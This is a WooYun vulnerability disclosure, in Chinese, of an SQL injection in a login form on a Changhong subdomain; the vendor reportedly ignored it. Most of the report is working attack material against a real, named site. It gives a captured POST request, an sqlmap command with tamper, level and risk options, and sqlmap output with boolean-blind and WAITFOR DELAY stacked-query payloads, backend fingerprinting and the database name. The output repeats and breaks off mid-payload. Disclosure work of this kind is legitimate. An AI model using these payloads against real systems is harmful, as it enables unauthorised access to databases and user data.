当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155168

漏洞标题:长虹某站一处SQL注入漏洞

相关厂商:changhong.com

漏洞作者: 路人甲

提交时间:2015-11-23 11:59

修复时间:2015-11-28 12:00

公开时间:2015-11-28 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /clients/login.aspx HTTP/1.1
Content-Length: 4070
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://tc.changhong.com:80/
Cookie: ASP.NET_SessionId=3pykogye1imvdbdxjygoz3gu; Hm_lvt_7a757d70d9522a73fd69f3e4f68c3131=1448247718,1448247729,1448247731,1448247812; Hm_lpvt_7a757d70d9522a73fd69f3e4f68c3131=1448247812; HMACCOUNT=47526AD588A50F29
Host: tc.changhong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24ContentPlaceHolder1%24Button3=%e7%a1%ae%e5%ae%9a&ctl00%24ContentPlaceHolder1%24TextBox2=1&ctl00%24ContentPlaceHolder1%24TextBox3=1*%20&ctl00%24tb_name=mytixqnr&ctl00%24tb_pass=g00dPa%24%24w0rD&ctl00%24TextBox1=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAmAcZURQnYYovcfT798MKEvjgYQvlQv2oDArr6l/nSamxT%2bfwkSZ9Cp4Yd%2bcN6IkV%2blBeHpy1zt3pnzJPIgYtaru3S8pWYO1BhvsosazapYPZ9UXI7RwI%2bukRHnd%2bAlDZ6RcyJC/7Uhv8pUuTwRcnZKCNTGu6fpAlK5HiRhQ3QX7uQuDNsn18Vb/yPhT9ZPmVqhqsP%2bq5zC%2bTCAcrBnhAXnj3k8BhAWsprzUvtt1mNSPg%3d%3d&__VIEWSTATE=/wEPDwULLTEyNDYxMzY3ODgPZBYCZg9kFgICAw9kFggCCw9kFgQCAQ8PFgIeBFRleHQFTuS4reW/g%2baWsOWinuKAnOi9r%2bS7tua6kOS7o%2beggeivhOa1i%2bivlemqjOWupOKAne%2b8jOivmumCgOWuouaIt%2bi/m%2bihjOivleeUqO%2b8gWRkAgUPFgIeC18hSXRlbUNvdW50AgkWEmYPZBYCZg8VBBcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9MSfkuK3lm73lkIjmoLzor4Tlrprlm73lrrborqTlj6/lp5TlkZjkvJocL3VwbG9hZHMvY2VydHMvbG9nby9jbmFzLnBuZyfkuK3lm73lkIjmoLzor4Tlrprlm73lrrborqTlj6/lp5TlkZjkvJpkAgEPZBYCZg8VBBcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9NBdDQueOsOWcuuajgOa1i%2bWunumqjOWupBovdXBsb2Fkcy9jZXJ0cy9sb2dvL2NiLnBuZxdDQueOsOWcuuajgOa1i%2bWunumqjOWupGQCAg9kFgJmDxUEFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD0yGOe%2bjuWbveS/nemZqeWVhuWunumqjOWupBovdXBsb2Fkcy9jZXJ0cy9sb2dvL3VsLnBuZxjnvo7lm73kv53pmanllYblrp7pqozlrqRkAgMPZBYCZg8VBBcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9Mxvnvo7lm73ogZTpgqbpgJrorq/lp5TlkZjkvJobL3VwbG9hZHMvY2VydHMvbG9nby9mY2MuanBnG%2be%2bjuWbveiBlOmCpumAmuiur%2bWnlOWRmOS8mmQCBA9kFgJmDxUEFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD04FeWunumqjOWupOiupOWumuivgeS5phwvdXBsb2Fkcy9jZXJ0cy9sb2dvL2F0ZGMucG5nFeWunumqjOWupOiupOWumuivgeS5pmQCBQ9kFgJmDxUEFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD03GOWbvemYsuiuoemHj%2baKgOacr%2bacuuaehB4vdXBsb2Fkcy9jZXJ0cy9sb2dvL%2bWbvemYsi5wbmcY5Zu96Ziy6K6h6YeP5oqA5pyv5py65p6EZAIGD2QWAmYPFQQXL2NlcnRzL2RldGFpbC5hc3B4P2lkPTYS5Zu95a626K6h6YeP5qCH5YeGJC91cGxvYWRzL2NlcnRzL2xvZ28v6K6h6YeP5qCH5YeGLnBuZxLlm73lrrborqHph4/moIflh4ZkAgcPZBYCZg8VBBcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9NRLkuJPpobnorqHph4/mjojmnYMkL3VwbG9hZHMvY2VydHMvbG9nby/kuJPpobnorqHph48ucG5nEuS4k%2bmhueiuoemHj%2baOiOadg2QCCA9kFgJmDxUEFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD05GENDQ%2beOsOWcuuajgOa1i%2bWunumqjOWupAAYQ0ND546w5Zy65qOA5rWL5a6e6aqM5a6kZAIPDxYCHwECBxYOZg9kFgJmDxUCHy9pbnNwZWN0aW9uL2pjLmFzcHg/dHlwZT1zYWZldHkM55S15Zmo5a6J5YWoZAIBD2QWAmYPFQIgL2luc3BlY3Rpb24vamMuYXNweD90eXBlPWFiaWxpdHkM55S15Zmo5oCn6IO9ZAICD2QWAmYPFQIcL2luc3BlY3Rpb24vamMuYXNweD90eXBlPWVtYwznlLXno4HlhbzlrrlkAgMPZBYCZg8VAiQvaW5zcGVjdGlvbi9qYy5hc3B4P3R5cGU9ZW52aXJvbm1lbnQY5Y%2bv6Z2g5oCn5LiO546v5aKD6K%2bV6aqMZAIED2QWAmYPFQIhL2luc3BlY3Rpb24vamMuYXNweD90eXBlPXdpcmVsZXNzEuaZuuiDveS6p%2bWTgea1i%2bivhGQCBQ9kFgJmDxUCKS9pbnNwZWN0aW9uL2pjLmFzcHg/dHlwZT1waHlzaWNvY2hlbWlzdHJ5EueOr%2bS/neeQhuWMluWIhuaekGQCBg9kFgJmDxUCJS9pbnNwZWN0aW9uL2pjLmFzcHg/dHlwZT1hdXRoZW50aWNhdGUM5oqA5pyv5pyN5YqhZAITDxYCHwECCBYQZg9kFgJmDxUCHi9tZXRyb2xvZ3kvamwuYXNweD90eXBlPWxlbmd0aAnlh6DkvZXph49kAgEPZBYCZg8VAiIvbWV0cm9sb2d5L2psLmFzcHg/dHlwZT10aGVybW90aWNzBueDreWtpmQCAg9kFgJmDxUCHS9tZXRyb2xvZ3kvamwuYXNweD90eXBlPWZvcmNlBuWKm%2bWtpmQCAw9kFgJmDxUCHS9tZXRyb2xvZ3kvamwuYXNweD90eXBlPWxpZ2h0BuWFieWtpmQCBA9kFgJmDxUCIy9tZXRyb2xvZ3kvamwuYXNweD90eXBlPWVsZWN0cmljaXR5CeeUteejgeWtpmQCBQ9kFgJmDxUCHS9tZXRyb2xvZ3kvamwuYXNweD90eXBlPXJhZGlvCeaXoOe6v%2beUtWQCBg9kFgJmDxUCJS9tZXRyb2xvZ3kvamwuYXNweD90eXBlPXRpbWVmcmVxdWVuY3kM5pe26Ze06aKR546HZAIHD2QWAmYPFQIhL21ldHJvbG9neS9qbC5hc3B4P3R5cGU9Y2hlbWlzdHJ5BuWMluWtpmQCFw8WAh8BAgkWEmYPZBYCZg8VAhcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9MQRDTkFTZAIBD2QWAmYPFQIXL2NlcnRzL2RldGFpbC5hc3B4P2lkPTQXQ0LnjrDlnLrmo4DmtYvlrp7pqozlrqRkAgIPZBYCZg8VAhcvY2VydHMvZGV0YWlsLmFzcHg/aWQ9MgJVTGQCAw9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD0zA0ZDQ2QCBA9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD04FeWunumqjOWupOiupOWumuivgeS5pmQCBQ9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD03GOWbvemYsuiuoemHj%2baKgOacr%2bacuuaehGQCBg9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD02EuWbveWutuiuoemHj%2bagh%2bWHhmQCBw9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD01EuS4k%2bmhueiuoemHj%2baOiOadg2QCCA9kFgJmDxUCFy9jZXJ0cy9kZXRhaWwuYXNweD9pZD05GENDQ%2beOsOWcuuajgOa1i%2bWunumqjOWupGRkHDfoTvQuuot1oCciXV6gSyy904x2F0Ekeswaf8weXgk%3d


sqlmap.py -r 4.txt --time-sec=10 --tamper=space2comment --level=5 --risk=3 --current-db


1.jpg


2.jpg


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: ctl00$ContentPlaceHolder1$Button3=%e7%a1%ae%e5%ae%9a&ctl00$ContentPlaceHolder1$TextBox2=1&ctl00$ContentPlaceHolder1$TextBox3=-8541' OR 1062=1062 AND 'XrPc'='XrPc &ctl00$tb_name=mytixqnr&ctl00$tb_pass=g00dPa$$w0rD&ctl00$TextBox1=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAmAcZURQnYYovcfT798MKEvjgYQvlQv2oDArr6l/nSamxT+fwkSZ9Cp4Yd+cN6IkV+lBeHpy1zt3pnzJPIgYtaru3S8pWYO1BhvsosazapYPZ9UXI7RwI+ukRHnd+AlDZ6RcyJC/7Uhv8pUuTwRcnZKCNTGu6fpAlK5HiRhQ3QX7uQuDNsn18Vb/yPhT9ZPmVqhqsP+q5zC+TCAcrBnhAXnj3k8BhAWsprzUvtt1mNSPg==&__VIEWSTATE=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
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ctl00$ContentPlaceHolder1$Button3=%e7%a1%ae%e5%ae%9a&ctl00$ContentPlaceHolder1$TextBox2=1&ctl00$ContentPlaceHolder1$TextBox3=1';WAITFOR DELAY '0:0:10'-- &ctl00$tb_name=mytixqnr&ctl00$tb_pass=g00dPa$$w0rD&ctl00$TextBox1=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAmAcZURQnYYovcfT798MKEvjgYQvlQv2oDArr6l/nSamxT+fwkSZ9Cp4Yd+cN6IkV+lBeHpy1zt3pnzJPIgYtaru3S8pWYO1BhvsosazapYPZ9UXI7RwI+ukRHnd+AlDZ6RcyJC/7Uhv8pUuTwRcnZKCNTGu6fpAlK5HiRhQ3QX7uQuDNsn18Vb/yPhT9ZPmVqhqsP+q5zC+TCAcrBnhAXnj3k8BhAWsprzUvtt1mNSPg==&__VIEWSTATE=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
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
current database: 'tc_database'


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: ctl00$ContentPlaceHolder1$Button3=%e7%a1%ae%e5%ae%9a&ctl00$ContentPlaceHolder1$TextBox2=1&ctl00$ContentPlaceHolder1$TextBox3=-8541' OR 1062=1062 AND 'XrPc'='XrPc &ctl00$tb_name=mytixqnr&ctl00$tb_pass=g00dPa$$w0rD&ctl00$TextBox1=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAmAcZURQnYYovcfT798MKEvjgYQvlQv2oDArr6l/nSamxT+fwkSZ9Cp4Yd+cN6IkV+lBeHpy1zt3pnzJPIgYtaru3S8pWYO1BhvsosazapYPZ9UXI7RwI+ukRHnd+AlDZ6RcyJC/7Uhv8pUuTwRcnZKCNTGu6fpAlK5HiRhQ3QX7uQuDNsn18Vb/yPhT9ZPmVqhqsP+q5zC+TCAcrBnhAXnj3k8BhAWsprzUvtt1mNSPg==&__VIEWSTATE=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